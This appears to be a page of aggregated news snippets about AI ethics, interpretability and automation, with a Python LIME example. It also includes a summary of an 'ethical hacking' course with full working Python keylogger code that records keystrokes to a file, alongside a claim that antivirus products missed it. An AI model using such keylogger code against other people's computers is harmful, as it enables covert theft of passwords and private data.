AI developers: don't forget ethics – London Business School

#artificialintelligence

Human biases can become part of the technology people create, according to Nicos Savva, Associate Professor of Management Science and Operations at London Business School. A recent report from the House of Lords Select Committee on Artificial Intelligence (AI), "AI in the UK: Ready, Willing and Able?", urged people using and developing AI to put ethics centre stage. The committee suggested a cross-sector AI Code with five principles that could be applied globally, including that artificial intelligence should "be developed for the common good and benefit of humanity" and should "operate on principles of intelligibility and fairness". The committee's chairman, Lord Clement-Jones, said in a statement: "The UK has a unique opportunity to shape AI positively for the public's benefit and to lead the international community in AI's ethical development, rather than passively accept its consequences." He added that "AI is not without its risks".


AI – unlocking the black box – London Business School

#artificialintelligence

It has been called the 'dark heart' of artificial intelligence (AI) – the complicated 'black box' of hidden machine learning algorithms that many would have us believe will allow AI to take our jobs and run our lives. But before that can happen, AI must be integrated into our everyday systems and protocols – including regulation. Product users and stakeholders must also have trust in AI and machine learning – otherwise they simply won't use it. New interpretability techniques are now making it possible to lift the lid on the black box. Overcoming the "Why should I trust you?" scepticism about AI and machine learning is perhaps the biggest challenge businesses must master to gain the trust of their stakeholders – customers, employees, shareholders, regulators and broader society.
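The article does not name specific interpretability techniques, but the quoted "Why should I trust you?" is also the title of the paper introducing LIME (Ribeiro et al., 2016), one widely used method for explaining individual predictions of a black-box model. A minimal sketch in Python, assuming a scikit-learn classifier and the lime package (the model and dataset here are illustrative, not drawn from the article):

# A minimal LIME sketch: explain one prediction of a "black box" model.
# The classifier and dataset below are illustrative assumptions.
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier
from lime.lime_tabular import LimeTabularExplainer

data = load_breast_cancer()
X, y = data.data, data.target

# Train an opaque model whose internals we won't inspect directly.
model = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)

# Fit a simple, locally faithful surrogate around a single prediction.
explainer = LimeTabularExplainer(
    X,
    feature_names=data.feature_names,
    class_names=data.target_names,
    mode="classification",
)
exp = explainer.explain_instance(X[0], model.predict_proba, num_features=5)

# Each pair is (feature condition, weight): which inputs drove this prediction.
for feature, weight in exp.as_list():
    print(f"{feature}: {weight:+.3f}")

The point of such techniques is that a stakeholder can see which inputs drove a particular decision without having to open the black box itself.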


Want to future-proof your business? Try a customised learning programme

#artificialintelligence

The past two decades have seen the workplace transformed by digital advances. Gone are many traditional structures and practices, replaced by new ways of doing business designed to support collaboration and digitally enabled remote and flexible working. As the technology behind AI and robotics becomes more sophisticated, the number of jobs that remain untouched by automation will decrease. "To keep pace, businesses must rethink how they organise work, reinvent jobs, redeploy staff and implement robust plans for the future," says Lynda Gratton, Professor of Management Practice at London Business School (LBS). There are also emerging social trends and shifting demographics to consider.


The Python Ethical Hacking Course: Windows Keylogger

@machinelearnbot

If your computer could talk, it would spill all sorts of secrets. The data it holds could divulge a wealth of lucrative information you'd never want exposed to an unauthorized party. In this course we dive into writing our own keylogger tool in Python, used to surveil a target Windows system and extract some of this sensitive information by collecting its keystroke inputs. I won't name names, but I tested these tools against three major Windows antivirus vendors and not one reported any malicious activity taking place.
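The summary doesn't include the course's actual code; as a minimal sketch of the core idea, a keystroke listener can be built on the pynput library (an assumption: the course may take a different approach), logging keys to a local file. Run it only on a machine you own or are explicitly authorised to test:

# Minimal keystroke-capture sketch using pynput (assumed library; not
# necessarily what the course uses). For authorised testing only.
from pynput import keyboard

LOG_FILE = "keystrokes.txt"  # hypothetical local log path

def on_press(key):
    try:
        text = key.char          # printable keys expose .char
    except AttributeError:
        text = f" [{key}] "      # special keys (Key.enter, Key.shift, ...)
    with open(LOG_FILE, "a", encoding="utf-8") as f:
        f.write(text)

def on_release(key):
    if key == keyboard.Key.esc:  # press Esc to stop the listener
        return False

with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

This stays deliberately minimal: it only captures keystrokes and logs them locally, which is the basic mechanism the course description says its tool builds on.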


Building ethical AI in healthcare: why we must demand it

#artificialintelligence

There is a school of thought that ponders a dark, dystopian future where artificially intelligent machines brutally and coldly run the world, with humans reduced to a mere biological tool. From Hollywood blockbusters to evangelical tech entrepreneurs, we've all been exposed to the possibility of this type of future, but have we all stopped to ponder how we should avoid it? Now, of course, all of this dystopia is many, many decades away, and only one of several gazillion possible future outcomes. But that doesn't preclude getting the conversation started today. For me, and many others, it boils down to one simple thing: ethics.